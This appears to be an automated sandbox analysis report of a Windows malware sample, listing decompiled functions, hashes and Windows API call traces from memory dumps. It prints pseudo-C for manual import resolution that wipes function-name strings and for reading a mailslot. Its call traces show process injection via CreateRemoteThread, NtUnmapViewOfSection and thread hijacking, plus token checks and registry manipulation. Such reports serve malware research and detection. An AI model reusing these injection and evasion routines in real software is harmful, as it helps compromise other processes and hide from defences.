  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
